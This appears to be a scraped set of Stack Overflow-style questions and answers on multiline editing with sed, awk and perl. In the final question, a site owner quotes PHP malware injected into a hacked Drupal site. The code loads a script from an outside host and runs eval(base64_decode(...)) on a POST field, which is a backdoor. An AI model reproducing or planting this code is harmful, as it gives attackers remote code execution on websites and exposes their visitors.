Can a sed address be multiline? - sed

I'm writing a sed script to remove some unused functions.
/private Integer functionName(/,/^ }$/ {
d
}
This works fine except it leaves the blank line above the function definition:
private Integer functionNameAbove(...) {
...
}
// This blank line gets left behind.
private Integer functionName(...) {
...
}
Is there a way to set the starting address to the blank line before the function signature?

With Perl:
$ perl -0777 -pe 's/private Integer functionName\(.*?\}//s' file
private Integer functionNameAbove(...) {
...
}
// This blank line gets left behind.
To edit in place, add -i switch:
perl -i -077 -pe ...........
With awk:
$ awk -v RS="" '{sub(/private Integer functionName\(.*}/, "");print}' file
private Integer functionNameAbove(...) {
...
}
// This blank line gets left behind.
To edit in place, add -i inplace switch (GNU awk):
awk -i inplace ..........

This might work for you (GNU sed):
sed 'N;/\nprivate Integer functionName(/{:a;$!{N;/\n$/!ba};d};P;D' file
Open a two line window throughout the length of the file and if the first line is empty and second begins private Integer functionName(, gather up lines until an empty line or the end of the file and delete them.
Otherwise, print then delete the first line and repeat.

Related

Replace one matched pattern with another in multiline text with sed

I have file with this text:
mirrors:
docker.io:
endpoint:
- "http://registry:5000"
registry:5000:
endpoint:
- "http://registry:5000"
localhost:
endpoint:
- "http://registry:5000"
I need to replace it with this text in POSIX shell script (not bash):
mirrors:
docker.io:
endpoint:
- "http://docker.io"
registry:5000:
endpoint:
- "http://registry:5000"
localhost:
endpoint:
- "http://localhost"
Replace should be done dynamically in all places without hard-coded names. I mean we should take sub-string from a first line ("docker.io", "registry:5000", "localhost") and replace with it sub-string "registry:5000" in a third line.
I've figure out regex, that splits it on 5 groups: (^ )([^ ]*)(:[^"]*"http:\/\/)([^"]*)(")
Then I've tried to use sed to print group 2 instead of 4, but this didn't work: sed -n 's/\(^ \)\([^ ]*\)\(:[^"]*"http:\/\/\)\([^"]*\)\("\)/\1\2\3\2\5/p'
Please help!
This might work for you (GNU sed):
sed -E '1N;N;/\n.*endpoint:.*\n/s#((\S+):.*"http://)[^"]*#\1\2#;P;D' file
Open up a three line window into the file.
If the second line contains endpoint:, replace the last piece of text following http:// with the first piece of text before :
Print/Delete the first line of the window and then replenish the three line window by appending the next line.
Repeat until the end of the file.
Awk would be a better candidate for this, passing in the string to change to as a variable str and the section to change (" docker.io" or " localhost" or " registry:5000") and so:
awk -v findstr=" docker.io" -v str="http://docker.io" '
$0 ~ findstr { dockfound=1 # We have found the section passed in findstr and so we set the dockfound marker
}
/endpoint/ && dockfound==1 { # We encounter endpoint after the dockfound marker is set and so we set the found marker
found=1;
print;
next
}
found==1 && dockfound==1 { # We know from the found and the dockfound markers being set that we need to process this line
match($0,/^[[:space:]]+-[[:space:]]"/); # Match the start of the line to the beginning quote
$0=substr($0,RSTART,RLENGTH)str"\""; # Print the matched section followed by the replacement string (str) and the closing quote
found=0; # Reset the markers
dockfound=0
}1' file
One liner:
awk -v findstr=" docker.io" -v str="http://docker.io" '$0 ~ findstr { dockfound=1 } /endpoint/ && dockfound==1 { found=1;print;next } found==1 && dockfound==1 { match($0,/^[[:space:]]+-[[:space:]]"/);$0=substr($0,RSTART,RLENGTH)str"\"";found=0;dockfound=0 }1' file

Conditional substitution of patterns in bash strings depending on the beginning of a string

I am new in bash, so excuse me if do not use the right terms.
I need to substitute certain patterns of six characters in a set of files. The order by patterns are substituted depends on the beginning of each string of text.
This is an example of input:
chr1:123-123 5GGGTTAGGGTTAGGGTTAGGGTTAGGGTTA3
chr1:456-456 5TTAGGGTTAGGGTTAGGGTTAGGGTTAGGG3
chr1:789-789 5GGGCTAGGGTTAGGGTTAGGGTTA3
chr1:123-123 etc is the name of the string, they are separated from the string I need to work with by a tab. The string I need to work with is delimited by characters 5 and 3, but I can change them.
I want that all patterns containing T, A, G in anyone of these orders is substituted with X: TTAGGG, TAGGG, AGGGTT, GGGTTA, GGTTAG, GTTAGG.
Similarly, patterns containing CTAGGG, like row 3, in orders similar to the previous one will be substituted with a different character.
The game is repeated with some specific differences for all the 6 characters composing each pattern.
I started writing something like this:
#!/bin/bash
NORMAL=`echo "\033[m"`
RED=`echo "\033[31m"` #red
#read filename for the input file and create a copy and a folder for the output
read -p "Insert name for INPUT file: " INPUT
echo "Creating OUTPUT file " "${RED}"$INPUT"_sub.txt${NORMAL}"
mkdir -p ./"$INPUT"_OUTPUT
cp $INPUT.txt ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
echo
#start the first set of instructions
perfrep
#starting a second set of instructions to substitute pattern with one difference from TTAGGG
onemism
Instructions are
perfrep() {
sed -i -e 's/TTAGGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/TAGGGT/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/AGGGTT/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GGGTTA/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GGTTAG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GTTAGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
}
# starting a second set of instructions to substitute pattern with one difference from TTAGGG
onemism(){
sed -i -e 's/[GCA]TAGGG/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/G[GCA]TAGG/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GG[GCA]TAG/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/GGG[GCA]TA/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/AGGG[GCA]T/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
sed -i -e 's/TAGGG[GCA]/L/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
}
I will need to repeat also with T[GCA]AGGG, TT[TCG]GGG, TTA[ACT]GG, TTAG[ACT]G and TTAGG[ACT].
Using this procedure, I get for these results for the inputs shown
5GGGXXXXTTA3
5XXXXX3
5GGGLXXTTA3
In my point of view, for my job, the first and second string are both made by X repeated five times, and the order of characters is just slightly different. On the other hand, the third one could be masked like this:
5LXXX3
How do I tell the script that if the string starts with 5GGGTTA instead of 5TTAGGG must start to substitute with
sed -i -e 's/GGGTTA/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
instead of
sed -i -e 's/TTAGGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
?
I will need to repeat with all cases; for instance, if the string starts with GTTAGG I will need to start with
sed -i -e 's/GTTAGG/X/g' ./"$INPUT"_OUTPUT/"$INPUT"_sub.txt
and so on, and add a couple of variation of my pattern.
I need to repeat the substitution with TTAGGG and the variations for all the rows of my input file.
Sorry for the very long question. Thank you all.
Adding information asked by Varun.
Patterns of 6 characters would be TTAGGG , [GCA]TAGGG , T[GCA]AGGG , TT[TCG]GGG , TTA[ACT]GG , TTAG[ACT]G , TTAGG[ACT].
Each one must be checked for a different frame, for instance for TTAGGG we have 6 frames TTAGGG , GTTAGG , GGTTAG, GGGTTA , AGGGTT , TAGGGT.
The same frames must be applied to the pattern containing a variable position.
I will have a total of 42 patterns to check, divided in 7 groups: one containing TTAGGG and derivative frames, 6 with the patterns with a variable position and their derivatives.
TTAGGG and derivatives are the most important and need to be checked first.
#! /usr/bin/awk -f
# generate a "frame" by moving the first char to the end
function rotate(base){ return substr(base,2) substr(base,1,1) }
# Unfortunately awk arrays do not store regexps
# so I am generating the list of derivative strings to match
function generate_derivative(frame,arr, i,j,k,head,read,tail) {
arr[i]=frame;
for(j=1; j<=length(frame); j++) {
head=substr(frame,1,j-1);
read=substr(frame,j,1);
tail=substr(frame,j+1);
for( k=1; k<=3; k++) {
# use a global index to simplify
arr[++Z]= head substr(snp[read],k,1) tail
}
}
}
BEGIN{
fs="\t";
# alternatives to a base
snp["A"]="TCG"; snp["T"]="ACG"; snp["G"]="ATC"; snp["C"]="ATG";
# the primary target
frame="TTAGGG";
Z=1; # warning GLOBAL
X[Z] = frame;
# primary derivatives
generate_derivative(frame, X);
xn = Z;
# secondary shifted targets and their derivatives
for(i=1; i<length(frame); i++){
frame = rotate(frame);
L[++Z] = frame;
generate_derivative(frame, L);
}
}
/^chr[0-9:-]*\t5[ACTG]*3$/ {
# because we care about the order of the prinary matches
for (i=1; i<=xn; i++) {gsub(X[i],"X",$2)}
# since we don't care about the order of the secondary matches
for (hit in L) {gsub(L[hit],"L",$2)}
print
}
END{
# print the matches in the order they are generated
#for (i=1; i<=xn; i++) {print X[i]};
#print ""
#for (i=1+xn; i<=Z; i++) {print L[i]};
}
IFF you can generate a static matching order you can live with then
something like the above Awk script could work. but you say the primary patterns should take precedence and that a secondary rule would be better applied first in some cases. (no can do).
If you need a more flexible matching pattern I would suggest looking at "recursive decent parsing with backtracking" Or "parsing expression grammars".
But then you are not in a bash shell anymore.

sed editing multiple lines

Sed editing is always a new challenge to me when it comes to multiple line editing. In this case I have the following pattern:
RECORD 4,4 ,5,48 ,7,310 ,10,214608 ,12,199.2 ,13,-19.2 ,15,-83 ,17,35 \
,18,0.8 ,21,35 ,22,31.7 ,23,150 ,24,0.8 ,25,150 ,26,0.8 ,28,25 ,29,6 \
,30,1200 ,31,1 ,32,0.2 ,33,15 ,36,0.4 ,37,1 ,39,1.1 ,41,4 ,80,2 \
,82,1000 ,84,1 ,85,1
which I want to convert into:
#RECORD 4,4 ,5,48 ,7,310 ,10,214608 ,12,199.2 ,13,-19.2 ,15,-83 ,17,35 \
# ,18,0.8 ,21,35 ,22,31.7 ,23,150 ,24,0.8 ,25,150 ,26,0.8 ,28,25 ,29,6\
# ,30,1200 ,31,1 ,32,0.2 ,33,15 ,36,0.4 ,37,1 ,39,1.1 ,41,4 ,80,2 \
# ,82,1000 ,84,1 ,85,1
Besides this I would like to preserve the entirety of these 4 lines (which may be more or less than 4 (unpredictable as the appear in the input) into one (long) line without the backslashes or line wraps.
Two tasks in one so to say.
sed is mandatory.
It's not terribly clear how you recognize the blocks you want to comment out, so I'll use blocks from a line that starts with RECORD and process as long as there are backslashes at the end (if your requirements differ, the patterns used will need to be amended accordingly).
For that, you could use
sed '/^RECORD/ { :a /\\$/ { N; ba }; s/[[:space:]]*\\\n[[:space:]]*/ /g; s/^/#/ }' filename
This works as follows:
/^RECORD/ { # if you find a line that starts with
# RECORD:
:a # jump label for looping
/\\$/ { # while there's a backslash at the end
# of the pattern space
N # fetch the next line
ba # loop.
}
# After you got the whole block:
s/[[:space:]]*\\\n[[:space:]]*/ /g # remove backslashes, newlines, spaces
# at the end, beginning of lines
s/^/#/ # and put a comment sign at the
# beginning.
}
Addendum: To keep the line structure intact, instead use
sed '/^RECORD/ { :a /\\$/ { N; ba }; s/\(^\|\n\)/&#/g }' filename
This works pretty much the same way, except the newline-removal is removed, and the comment signs are inserted after every line break (and once at the beginning).
Addendum 2: To just put RECORD blocks onto a single line:
sed '/^RECORD/ { :a /\\$/ { N; ba }; s/[[:space:]]*\\\n[[:space:]]*/ /g }' filename
This is just the first script with the s/^/#/ bit removed.
Addendum 3: To isolate RECORD blocks while putting them onto a single line at the same time,
sed -n '/^RECORD/ { :a /\\$/ { N; ba }; s/[[:space:]]*\\\n[[:space:]]*/ /g; p }' filename
The -n flag suppresses the normal default printing action, and the p command replaces it for those lines that we want printed.
To write those records out to a file while commenting them out in the normal output at the same time,
sed -e '/^RECORD/ { :a /\\$/ { N; ba }; h; s/[[:space:]]*\\\n[[:space:]]*/ /g; w saved_records.txt' -e 'x; s/\(^\|\n\)/&#/g }' foo.txt
There's actually new stuff in this. Shortly annotated:
#!/bin/sed -f
/^RECORD/ {
:a
/\\$/ {
N
ba
}
# after assembling the lines
h # copy them to the hold buffer
s/[[:space:]]*\\\n[[:space:]]*/ /g # put everything on a line
w saved_records.txt # write that to saved_records.txt
x # swap the original lines back
s/\(^\|\n\)/&#/g # and insert comment signs
}
When specifying this code directly on the command line, it is necessary to split it into several -e options because the w command is not terminated by ;.
This problem does not arise when putting the code into a file of its own (say foo.sed) and running sed -f foo.sed filename instead. Or, for the advanced, putting a #!/bin/sed -f shebang on top of the file, chmod +xing it and just calling ./foo.sed filename.
Lastly, to edit the input file in-place and print the records to stdout, this could be amended as follows:
sed -i -e '/^RECORD/ { :a /\\$/ { N; ba }; h; s/[[:space:]]*\\\n[[:space:]]*/ /g; w /dev/stdout' -e 'x; s/\(^\|\n\)/&#/g }' filename
The new things here are the -i flag for inplace editing of the file, and to have /dev/stdout as target for the w command.
sed '/^RECORD.*\\$/,/[^\\]$/ s/^/#/
s/^RECORD.*/#&/' YourFile
After several remark of #Wintermute and more information from OP
Assuming:
line with RECORD at start are a trigger to modify the next lines
structure is the same (no line with \ with a RECORD line following directly or empty lines)
Explain:
take block of line starting with RECORD and ending with \
add # in front of each line
take line (so after ana eventual modification from earlier block that leave only RECORD line without \ at the end or line without record) and add a # at the start if starting with RECORD

Search for a particular multiline pattern using awk and sed

I want to read from the file /etc/lvm/lvm.conf and check for the below pattern that could span across multiple lines.
tags {
hosttags = 1
}
There could be as many white spaces between tags and {, { and hosttags and so forth. Also { could follow tags on the next line instead of being on the same line with it.
I'm planning to use awk and sed to do this.
While reading the file lvm.conf, it should skip empty lines and comments.
That I'm doing using.
data=$(awk < cat `cat /etc/lvm/lvm.conf`
/^#/ { next }
/^[[:space:]]*#/ { next }
/^[[:space:]]*$/ { next }
.
.
How can I use sed to find the pattern I described above?
Are you looking for something like this
sed -n '/{/,/}/p' input
i.e. print lines between tokens (inclusive)?
To delete lines containing # and empty lines or lines containing only whitespace, use
sed -n '/{/,/}/p' input | sed '/#/d' | sed '/^[ ]*$/d'
space and a tab--^
update
If empty lines are just empty lines (no ws), the above can be shortened to
sed -e '/#/d' -e '/^$/d' input
update2
To check if the pattern tags {... is present in file, use
$ tr -d '\n' < input | grep -o 'tags\s*{[^}]*}'
tags { hosttags = 1# this is a comment}
The tr part above removes all newlines, i.e. makes everything into one single line (will work great if the file isn't to large) and then search for the tags pattern and outputs all matches.
The return code from grep will be 0 is pattern was found, 1 if not.
Return code is stored in variable $?. Or pipe the above to wc -l to get the number of matches found.
update3
regex for searcing for tags { hosttags=1 } with any number of ws anywhere
'tags\s*{\s*hosttags\s*=\s*1*[^}]*}'
try this line:
awk '/^\s*#|^\s*$/{next}1' /etc/lvm/lvm.conf
One could try preprocessing the file first, removing commments and empty lines and introducing empty lines behind the closing curly brace for easy processing with the second awk.
awk 'NF && $1!~/^#/{print; if(/}/) print x}' file | awk '/pattern/' RS=

sed, replace first line

I got hacked by running a really outdated Drupal installation (shame on me)
It seems they injected the following in every .php file;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
}
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
Can I remove and replace this with sed? e.g.:
find . -name *.php | xargs ...
I hope to have the site working just for the time being to use wget and made a static copy.
You can use sed with something like
sed '1 s/^.*$/<?php/'
The 1 part only replaces the first line. Then, thanks to the s command, it replaces the whole line by <?php.
To modify your files in-place, use the -i option of GNU sed.
To replace the first line of a file, you can use the c (for "change") command of sed:
sed '1c<?php'
which translates to: "on line 1, replace the pattern space with <?php".
For this particular problem, however, something like this would probably work:
sed '1,/^$/c<?php'
which reads: change the range "line 1 to the first empty line" to <?php, thus replacing all injected code.
(The second part of the address (the regular expression /^$/) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
result:
b
a
a
perl is needed for more complex regex,
for example regex lookaround (lookahead, lookbehind)
sample use:
patch shebang lines in script files to use /usr/bin/env
shebang line is the first line: #!/bin/bash etc
find . -type f -exec perl -p -i -e \
'$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
this will replace #! /usr/bin/python3 with #!/usr/bin/env python3
to make the script more portable (nixos linux, ...)
the (?!env) (negative lookahead) prevents double-replacing
its not perfect, since #!/bin/env foo is not replaced with #!/usr/bin/env foo ...